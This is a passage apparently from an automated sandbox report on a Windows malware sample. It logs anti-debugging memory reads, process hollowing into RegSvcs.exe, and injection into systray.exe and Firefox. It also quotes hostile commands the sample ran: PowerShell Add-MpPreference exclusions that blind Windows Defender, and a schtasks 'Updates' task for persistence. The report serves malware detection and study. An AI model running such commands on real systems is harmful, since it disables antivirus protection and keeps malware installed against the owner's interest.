                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C5ED mov eax, dword ptr fs:[00000030h]9_2_0151C5ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C5ED mov eax, dword ptr fs:[00000030h]9_2_0151C5ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2582 mov eax, dword ptr fs:[00000030h]9_2_014E2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2582 mov ecx, dword ptr fs:[00000030h]9_2_014E2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E59C mov eax, dword ptr fs:[00000030h]9_2_0151E59C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01514588 mov eax, dword ptr fs:[00000030h]9_2_01514588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015045B1 mov eax, dword ptr fs:[00000030h]9_2_015045B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015045B1 mov eax, dword ptr fs:[00000030h]9_2_015045B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150245A mov eax, dword ptr fs:[00000030h]9_2_0150245A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A456 mov eax, dword ptr fs:[00000030h]9_2_0159A456
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D645D mov eax, dword ptr fs:[00000030h]9_2_014D645D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C460 mov ecx, dword ptr fs:[00000030h]9_2_0156C460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A430 mov eax, dword ptr fs:[00000030h]9_2_0151A430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC427 mov eax, dword ptr fs:[00000030h]9_2_014DC427
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E04E5 mov ecx, dword ptr fs:[00000030h]9_2_014E04E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A49A mov eax, dword ptr fs:[00000030h]9_2_0159A49A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015144B0 mov ecx, dword ptr fs:[00000030h]9_2_015144B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E64AB mov eax, dword ptr fs:[00000030h]9_2_014E64AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156A4B0 mov eax, dword ptr fs:[00000030h]9_2_0156A4B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522750 mov eax, dword ptr fs:[00000030h]9_2_01522750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522750 mov eax, dword ptr fs:[00000030h]9_2_01522750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01564755 mov eax, dword ptr fs:[00000030h]9_2_01564755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E75D mov eax, dword ptr fs:[00000030h]9_2_0156E75D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov esi, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov eax, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov eax, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0750 mov eax, dword ptr fs:[00000030h]9_2_014E0750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8770 mov eax, dword ptr fs:[00000030h]9_2_014E8770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510710 mov eax, dword ptr fs:[00000030h]9_2_01510710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C700 mov eax, dword ptr fs:[00000030h]9_2_0151C700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0710 mov eax, dword ptr fs:[00000030h]9_2_014E0710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155C730 mov eax, dword ptr fs:[00000030h]9_2_0155C730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov eax, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov ecx, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov eax, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C720 mov eax, dword ptr fs:[00000030h]9_2_0151C720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C720 mov eax, dword ptr fs:[00000030h]9_2_0151C720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EC7C0 mov eax, dword ptr fs:[00000030h]9_2_014EC7C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015607C3 mov eax, dword ptr fs:[00000030h]9_2_015607C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E47FB mov eax, dword ptr fs:[00000030h]9_2_014E47FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E47FB mov eax, dword ptr fs:[00000030h]9_2_014E47FB
                    Source: C:\Users\user\Desktop\Documents.exe; Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Documents.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtOpenSection: Direct from: 0x76EF2E0C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtCreateFile: Direct from: 0x76EF2FEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtOpenFile: Direct from: 0x76EF2DCC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtCreateMutant: Direct from: 0x76EF35CC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtResumeThread: Direct from: 0x76EF36AC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtReadFile: Direct from: 0x76EF2ADC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtResumeThread: Direct from: 0x76EF2FBC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtClose: Direct from: 0x76EF2B6C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | NtCreateKey: Direct from: 0x76EF2C6C
                    Source: C:\Users\user\Desktop\Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: read write
                    Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 4072
                    Source: C:\Windows\SysWOW64\systray.exe | Thread APC queued: target process: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                    Source: C:\Users\user\Desktop\Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\Desktop\Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                    Source: C:\Users\user\Desktop\Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CC6008
                    Source: C:\Users\user\Desktop\Documents.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"
                    Source: C:\Users\user\Desktop\Documents.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                    Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Users\user\Desktop\Documents.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
